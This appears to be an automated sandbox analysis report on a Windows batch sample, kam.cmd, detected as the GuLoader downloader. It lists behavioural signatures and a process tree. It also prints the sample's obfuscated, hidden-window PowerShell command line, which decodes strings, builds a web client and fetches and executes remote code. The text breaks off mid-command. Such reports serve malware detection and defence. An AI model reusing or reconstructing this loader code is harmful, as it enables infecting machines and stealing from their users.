Windows
Analysis Report
kam.cmd
Overview
General Information
Detection
GuLoader
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 5084 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\kam.c md" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 984 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5256 cmdline:
powershell .exe -wind owstyle hi dden "$Kia ki = 1;$Va abenmnd='S ub';$Vaabe nmnd+='str in';$Vaabe nmnd+='g'; Function H ystadens($ Rivalled){ $Kortende= $Rivalled. Length-$Ki aki;For($R ansagnings kendelsens =5;$Ransag ningskende lsens -lt $Kortende; $Ransagnin gskendelse ns+=6){$In dervrelses +=$Rivalle d.$Vaabenm nd.Invoke( $Ransagni ngskendels ens, $Kiak i);}$Inder vrelses;}f unction Bi lledhugger en($Dmpnin gsfaktorer nes){&($Se archlights ) ($Dmpnin gsfaktorer nes);}$Mai mon=Hystad ens 'skurv MSekuno Ko ,tzplotti Carbl line lAdkvaaKom mu/Super5o v,rl. Stje 0un ud Kar ma( .ropWW agwiiPyruv nSyfildTel efoMultiwb rk.osUnpau artiN Fib uT orma f, rly1Sj.eg0 D,spe. hed a0 Loya;A, fot GramWU .kamiStudi n Poli6Ska tt4Hoard;B agst Svi.e x Klem6 Sa le4Ambis; ,res .onoc rFedervFas ci:An,at1N ords2.tent 1Doven.oop ho0Frkap)C o cl Retur GTampoeSn, escSundhk krifocentr /Kigho2 .o oc0Radio1M o.kr0Merce 0Cents1Eng ol0 nthr1L euco sn.sF KundsiMy,o mr MicreVe terfOptimo Lyst xR,pa g/ ,xam1Kn ipl2 Sloo1 Thwar. ror e0 Trus '; $Cleanlier 245=Hystad ens ' over U Sam,sSta ngefi.dyrS ta n-C,ook AHamarg ns taeSnavenP recotisoan ';$Outgna w=Hystaden s ' .redhH aematsnapp t Svkkp Di plsYe.rn:R ecip/.edtp /Aa dvwS r afwsp,rtw Ta.r. H,lb sAntileEje ndnUgunsdH ssesSockh pDuo eaiac .hcSe,sieC ockm.Dand, cTe.rio Mo stmPaleo/S ubopUnvol rA.totoBet on/Gstg d R.sll .nsa /Intero er iegSemicms hivo6Fjern qSlagtcPhi lt ';$Krag erede=Hyst adens 'Pro ph>Knuck ' ;$Searchli ghts=Hysta dens ' gen ni AfteeTr ,nsxOutto ';$Eradica ted='Tj';$ Unvision = Hystadens 'finaneUp ayacFrotth nonvoS.bm a Balsa%Mi se aCamoup Und,spFor, jdO.ercaOv erbtDaab,a Irous% ,ed s\cam uT T elecRecr,h Non,i las kcResi.kSa nit.El phI Tena.tTrkv oeXylog Pl a i& Benm& Foreg Tur. ueTillbcun gulhCliteo Habuk Th n kt Epis '; Billedhugg eren (Hyst adens ' Tr de$AnnamgV in alvoldt o Sul,b .o rka .elilS ting:Graph BSpasmoUdb l r Acrad. uldsi,eerb nSpatlgS.s ed= Su a(B uffwcFro b mXylogdSag vo Primr/D obbecEksdi Drugg$Dek leULmarkn Jun.vMusli i VentsBek l.iRut foR igkenGeoem )No di '); Billedhugg eren (Hyst adens 'Man ip$ paitgH yperl.nedk oPetrobP,e pra ydrolI .ter:D les Jtenora.ra nsr AsienM ang.oNg,el =A,sin$Ter raOReuneuL abyrt E en gnonvenG i soaBullfwT ngh.Engel s.emoupGap erlTelefiZ olaet Anlg ( Pla.$Unf oKPr,rerD isora.fter gLys ieBis m,rSlambeH ipbodChopl e .ass) In cu ');$Out gnaw=$Jarn o[0];$Card iospermum= (Hystaden s '.isas$U nanigProba lKart oS,i nebmi,rea, lerflRetic :RulleSRei nseOpslucS t rerEudio eLleuft Po rtsArbit=Y ahunN Epit eGala wLam fl-ForglO TilkbCl do j flogeArg otcU.yret Kvle Modar SPrivayfyl desReckotN yctaeInfor msamme. un muNkomm,eR elattPrein .Op.trWbom bee Va.sbF jernCNonco lCabuliTro